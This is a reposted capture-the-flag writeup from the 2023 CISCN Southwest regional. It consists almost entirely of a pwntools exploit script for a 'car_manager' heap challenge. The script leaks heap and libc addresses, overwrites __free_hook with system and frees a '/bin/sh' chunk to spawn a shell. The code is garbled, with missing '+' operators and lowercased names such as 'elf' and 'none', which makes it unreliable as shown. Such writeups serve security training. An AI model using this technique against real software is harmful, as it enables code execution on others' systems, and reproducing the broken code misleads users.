[原创]2023ciscn西南赛区pwn writeup | 宜武汇-ag真人国际厅网站

# _*_ coding:utf-8 _*_

from pwn import *

import re

import os, struct, random, time, sys, signal

import hashlib

from hashlib import sha256

 

p = process("./car_manager")

elf = elf("./car_manager")

libc = elf.libc

 

context.log_level = "debug" # info

context.arch = elf.arch

context.terminal = ['tmux', 'splitw', '-hp','64']

 

 

def dbg(breakpoint=''):

    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0

    script = 'b *{:#x}\n'.format(int(breakpoint) elf_base) if isinstance(breakpoint, int) else breakpoint

    gdb.attach(p,script)

    pause()

 

#-----------------------------------------------------------------------------------------

s       = lambda data               :p.send(str(data))

sa      = lambda text,data          :p.sendafter(text, str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda text,data          :p.sendlineafter(text, str(data))

r       = lambda num=4096           :p.recv(num)

ru      = lambda text               :p.recvuntil(text)

ia      = lambda                    :p.interactive()

hs256   = lambda data               :sha256(str(data).encode()).hexdigest()

l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))

l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))

uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))

uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))

int16   = lambda data               :int(data,16)

lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))

# sc      = lambda                    :shellcraft.amd64.linux.sh()

#-----------------------------------------------------------------------------------------

 

 

def add(make,model,year,size,pressure):

    sla("please enter your choice:",1)

    sla("enter the make of the car: ",make)

    sla("enter the model of the car: ",model)

    sla("enter the year of the car: ",year)

    sla("enter the size of tire : ",size)

    sla("enter the pressure of tire : ",pressure)

 

def dele(idx):

    sla("please enter your choice:",2)

    sla("enter the index of the car to delete: ",idx)

 

def find(make,model,year):

    sla("please enter your choice:",3)

    sla("enter the make of the car to find: ",make)

    sla("enter the model of the car to find: ",model)

    sla("enter the year of the car to find: ",year)

 

def edit(idx, make, model, year, choice, tire_size, tire_pressure, tire_idx=none):

    sla("please enter your choice:",4)

    sla("enter the index of the car to modify: ",idx)

    sla("enter the new make of the car: ",make)

    sla("enter the new model of the car: ",model)

    sla("enter the new year of the car: ",year)

    sla("do you want to change all tires?(1/0)",choice)

    if choice==1:

        sla("enter the new size of tire : ",tire_size)

        sla("enter the new pressure of tire : ",tire_pressure)

    else:

        sla("enter the idx of tire : ",tire_idx)

        sla("enter the new size of tire : ",tire_size)

        sla("enter the new pressure of tire : ",tire_pressure)

 

def copy(idx):

    sla("please enter your choice:",5)

    sla("enter the index of the car to copy: ",idx)

 

 

def show():

    sla("please enter your choice:",6)

 

for i in range(0x101):

    add('e4l4',i,1999,0x10,0x10)

 

 

copy(0)

copy(255)

dele(0)

show()

ru("tire sizes: 0, ")

heap_base_2 = int((ru(",")[:-1]),10)

lg('heap_base_2')

 

ru("tire pressures: 0, ")

heap_base_1 = int((ru(",")[:-1]),10)

lg('heap_base_1')

 

heap_base = (heap_base_1 << 32) heap_base_2-0x011eb0

lg('heap_base')

 

unsort_heap_2 = (heap_base 0x01a0b0)&0xffffffff

unsort_heap_1 = (heap_base 0x01a0b0)>>32

edit(256,'e4l4',1,1999,1,unsort_heap_2 0x10,unsort_heap_1)

add('e4l4',259,1999,0,0)

 

show()

ru("car 258:")

ru(", ")

libc_base_2 = int((ru(",")[:-1]),10)

ru("tire pressures: ")

ru(", ")

libc_base_1 = int((ru(",")[:-1]),10)

libc_base = (libc_base_1 << 32) libc_base_2-0x1ecbe0

lg("libc_base")

 

free_hook = libc_base 0x1eee48

system = libc_base 0x52290

sh = 0x68732f6e69622f

 

dele(257)

show()

 

edit(254,'e4l4',1,1999,0,free_hook&0xffffffff,free_hook>>32,1)

edit(254,'e4l4',1,1999,0,sh&0xffffffff,sh>>32,0)

add('e4l4','e4l4',1999,system&0xffffffff,system>>32)

dele(254)

 

ia()

原文链接:https://bbs.kanxue.com/thread-277650.htm

网络摘文,本文作者:15h,如若转载,请注明出处:https://www.15cov.cn/2023/08/27/原创2023ciscn西南赛区pwn-writeup/

发表评论

邮箱地址不会被公开。 必填项已用*标注

网站地图